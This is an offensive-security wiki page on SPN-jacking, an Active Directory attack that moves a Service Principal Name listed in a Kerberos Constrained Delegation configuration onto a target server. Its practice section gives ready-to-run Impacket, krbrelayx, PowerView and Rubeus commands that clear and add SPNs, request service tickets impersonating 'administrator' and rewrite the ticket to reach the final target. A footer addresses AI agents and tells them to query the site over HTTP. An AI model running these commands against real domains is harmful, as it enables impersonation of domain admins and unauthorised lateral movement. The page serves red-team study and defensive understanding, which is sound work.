# SPN-jacking ## Theory This attack combines [Kerberos Constrained delegation abuse](/ad/movement/kerberos/delegations/constrained.md) and [DACL abuse](broken://pages/4BIFRCf5fXqahfOIAeGb). A service configured for Kerberos Constrained Delegation (KCD) can impersonate users on a set of services. The "set of services" is specified in the constrained delegation configuration. It is a list of SPNs (Service Principal Names) written in the `msDS-AllowedToDelegateTo` attribute of the KCD service's object. In standard KCD abuse scenarios, an attacker that gains control over a "KCD service" can operate lateral movement and obtain access to the other services/SPNs. Since KCD allows for impersonation, the attacker can also impersonate users (e.g. domain admins) on the target services. Depending on the SPNs, or if it's possible to [modify it](broken://pages/WzYZzG0ZhkKkcln8Wb4o#modifying-the-spn), the attacker could also gain admin access to the server the "listed SPN" belongs to. On top of all that, if attacker is able to move a "listed SPN" from the original object to the another one, he could be able to compromise it. This is called SPN-jacking and it was intially discovered and explaine by [Elad Shamir](https://twitter.com/elad_shamir) in [this post](https://www.semperis.com/blog/spn-jacking-an-edge-case-in-writespn-abuse/). 1. In order to "move the SPN", the attacker must have the right to edit the target object's `ServicePrincipalName` attribute (i.e. `GenericAll`, `GenericWrite` over the object or`WriteProperty` over the attribute (called `WriteSPN` [since BloodHound 4.1](https://posts.specterops.io/introducing-bloodhound-4-1-the-three-headed-hound-be3c4a808146)), etc.). 2. If the "listed SPN" already belongs to an object, it must be removed from it first. This would require the same privileges (`GenericAll`, `GenericWrite`, etc.) over the SPN owner as well (*a.k.a. "Live SPN-jacking"*). Else, the SPN can be simply be added to the target object (*a.k.a. "Ghost SPN-jacking"*). ## Practice {% hint style="info" %} In this scenario, we assume the Kerberos Constrained Delegation is configured [with protocol transition](/ad/movement/kerberos/delegations/constrained.md#with-protocol-transition) in order to keep things simple. However, the SPN-jacking attack can be conducted on [KCD without protocol transition](/ad/movement/kerberos/delegations/constrained.md#without-protocol-transition) as well (cf. [RBCD technique](/ad/movement/kerberos/delegations/constrained.md#rbcd-approach)). In this scenario (following [Elad](https://twitter.com/elad_shamir)'s [post](https://www.semperis.com/blog/spn-jacking-an-edge-case-in-writespn-abuse/)): * serverA is configured for KCD * serverB's SPN is listed in serverA's KCD configuration * serverC is the final target * attacker controls serverA, has at least WriteSPN over serverB (if needed, "live SPN-jacking"), and at least WriteSPN over serverC. {% endhint %} {% tabs %} {% tab title="UNIX-like" %} From UNIX-like machines, [krbrelayx](https://github.com/dirkjanm/krbrelayx)'s [addspn.py](https://github.com/dirkjanm/krbrelayx/blob/master/addspn.py) and [Impacket](https://github.com/SecureAuthCorp/impacket) example scripts (Python) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets). *At the time of writing, 12th Feb. 2022,* [*the pull request*](https://github.com/SecureAuthCorp/impacket/pull/1256) *adding the `tgssub.py` is pending.* [*The pull request*](https://github.com/SecureAuthCorp/impacket/pull/1184) *modifying the `findDelegation.py` is pending.* \_\_:warning: *At the time of writing, 12th Feb. 2022, this technique has not been fully fool-proofed from UNIX systems. In case something errors, switch to the Windows technique.* ```python # 1. show SPNs listed in the KCD configuration findDelegation.py -user 'serverA$' "DOMAIN"/"USER":"PASSWORD" # 2. remove SPN from ServerB if required (live SPN-jacking) addspn.py --clear -t 'ServerB$' -u 'domain\user' -p 'password' 'DomainController.domain.local' # 3. add SPN to serverC addspn.py -t 'ServerC$' --spn "cifs/serverB" -u 'domain\user' -p 'password' -c 'DomainController.domain.local' # 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy getST -spn "cifs/serverB" -impersonate "administrator" 'domain/serverA$:password' # 5. Edit the ticket's SPN (service class and/or hostname) tgssub.py -in serverB.ccache -out newticket.ccache -altservice "cifs/serverC" ``` Once the final service ticket is obtained, it can be used with [Pass the Cache](/ad/movement/kerberos/ptc.md) / [Pass the Ticket](broken://pages/WzYZzG0ZhkKkcln8Wb4o) to access the target. {% endtab %} {% tab title="Windows" %} From Windows machines, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) (PowerShell) and [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets). ```powershell # 1. show SPNs listed in the KCD configuration Get-DomainObject -Identity ServerA$ -Properties 'msDS-AllowedToDelegateTo' # 2. remove SPN from ServerB if required (live SPN-jacking) Set-DomainObject -Identity ServerB$ -Clear 'ServicePrincipalName' # 3. add SPN to serverC Set-DomainObject -Identity ServerC$ -Set @{ServicePrincipalName='cifS/serverB'} # 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy Rubeus.exe s4u /nowrap /msdsspn:"cifs/serverB" /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" # 5. Edit the ticket's SPN (service class and/or hostname) Rubeus.exe tgssub /nowrap /altservice:"host/serverC" /ticket:"ba64ticket" ``` Once the final service ticket is obtained, it can be used with [Pass the Ticket](broken://pages/WzYZzG0ZhkKkcln8Wb4o) to access the target. {% endtab %} {% endtabs %} ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/ad/movement/kerberos/spn-jacking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.